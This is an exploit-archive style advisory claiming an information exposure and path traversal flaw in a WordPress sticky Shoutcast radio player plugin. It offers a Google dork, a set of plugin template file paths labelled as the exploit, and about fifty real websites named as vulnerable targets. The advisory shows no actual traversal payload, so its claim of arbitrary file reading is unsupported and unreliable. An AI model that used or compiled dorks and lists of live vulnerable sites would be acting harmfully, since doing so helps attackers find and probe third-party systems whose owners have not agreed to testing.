#########################################################################################

# Exploit Title : WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player/17162755
codecanyon.net/item/sticky-radio-player-full-width-shoutcast-and-icecast-html5-player/16897465
# Software Price : 15$ and 19$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : From 3.0 to 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

#########################################################################################

# Impact :
********

* WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x and other versions are prone to an arbitrary file disclosure 

vulnerability because the plugin fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to read local files with the privileges of the web server process, 

which may aid in launching further attacks. 

* An information exposure is the intentional or unintentional disclosure 

of information to an actor who is not explicitly authorized to access that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or 

directory located underneath a restricted parent directory, but it does not 

properly neutralize special elements within the pathname that can cause the pathname 

to resolve to a location outside of the restricted directory.

#########################################################################################

# Exploit :
***********************

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/categories.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_player.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_playlist_record.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Add_New

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Help

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/help.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/players.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/preview.html

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/playlist.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/settings_form.php

#########################################################################################

# Video Tutorials

Installation - youtube.com/watch?v=AnhaPcIZUjc
Manage the Categories and Playlist - youtube.com/watch?v=pZynu26UKbs
How to insert the player into your website - youtube.com/watch?v=RY3ikHSdTNg

#########################################################################################

# Example Vulnerable Sites :
*************************

[+] frissfm.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiopela.mk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] onadesants.cat/wp/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] pensereal.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] ukieradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] giveme5prod.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radyomedya.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioplus.org.uk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] thespyfm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] mensajerofm.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] fmcidadejardim.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] fondationfemidejabat.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] superlivefm.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] unicolegio.com/home/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioe.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioarcadie.net/cercle/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] santaupdate.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] sahinfm.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] horebradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiobanglanet.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiosantacruz.com.br/online/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] proyectovidamcym.com.uy/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiokontho.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] misionvidainternacional.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radio7.co.tz/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] dizzimonline.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] caraotaradio.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] escandalofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] koswradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radio-busovaca.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] eldesconcierto.com.ar/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] gunbitas.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] canarinhofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] resguardoicl.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiovioladeouro.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] cadenaradialjupiter.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radyo-anadolu.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] buenaventuraenlinea.com/bradio/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] elfhq.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioserbona.rs/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] renewx.gq/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiociresarii.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] vibez24.com.ng/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] lol-corsica.fr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] confidencialacesse.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioparaisofm.cl/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] lapicosa.com.mx/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] caraotaradio.ml/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################